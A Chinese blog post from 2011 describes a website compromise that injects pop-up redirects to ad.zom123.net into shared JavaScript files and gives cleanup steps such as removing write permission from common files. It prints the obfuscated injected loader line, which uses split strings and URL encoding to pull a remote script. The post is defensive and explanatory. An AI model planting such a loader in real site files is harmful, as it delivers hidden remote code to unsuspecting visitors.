=波波日志 > 黑客技术 > ad.zom123.net弹窗木马=
ad.zom123.net弹窗木马
最近看到朋友的网站第一次访问的时候会转向到ad.zom123.net这个网址,然后弹窗窗口,还以为我电脑中病毒了,后面在网上查找好像有很多都有ad.zom123.net这个问题。
出现这个问题就是基本是你的站被黑了,一些公用js文件被插入了下面的JavaScript代码
这个广告代码是动态插入的,直接查看源文件无法找到,需要借助firebug或者ie8+的开发者调试工具才能发现。
此广告代码,是自动判断IP段的,所以有些站点站长自己无法检查到。
修复
查找公用的js文件,看是否存在上面的代码,一般是插入在js文件的最后。在确保你的ftp账户是安全的并且服务器没有被黒入的情况下,这个问题那就可能是网站漏洞了,被上传了木马,被掌握的fso权限。如果是fso权限被掌握了,最好好的办法就是将公用的文件,包括js,inlude进来的文件的写入权限去掉,这样可以保证不被fso修改文件。
如果无法定位中病毒的文件,可以联系我,帮你查找那个病毒。
出现这个问题就是基本是你的站被黑了,一些公用js文件被插入了下面的JavaScript代码
+展开
-JavaScript
document.write('<sc'+'ript src="<\/sc'+'ript>'">http://%61d'+'.%7ao'+'m1'+'2%33'+'.ne'+'t/ip'+'.asp?'+'c=tianjin|vietnam"><\/sc'+'ript>');
这个广告代码是动态插入的,直接查看源文件无法找到,需要借助firebug或者ie8+的开发者调试工具才能发现。
此广告代码,是自动判断IP段的,所以有些站点站长自己无法检查到。
修复
查找公用的js文件,看是否存在上面的代码,一般是插入在js文件的最后。在确保你的ftp账户是安全的并且服务器没有被黒入的情况下,这个问题那就可能是网站漏洞了,被上传了木马,被掌握的fso权限。如果是fso权限被掌握了,最好好的办法就是将公用的文件,包括js,inlude进来的文件的写入权限去掉,这样可以保证不被fso修改文件。
如果无法定位中病毒的文件,可以联系我,帮你查找那个病毒。
类别:黑客技术 作者:波波 日期:2011-12-20 【评论:0】
相关文章
暂时没有评论!
发表留言
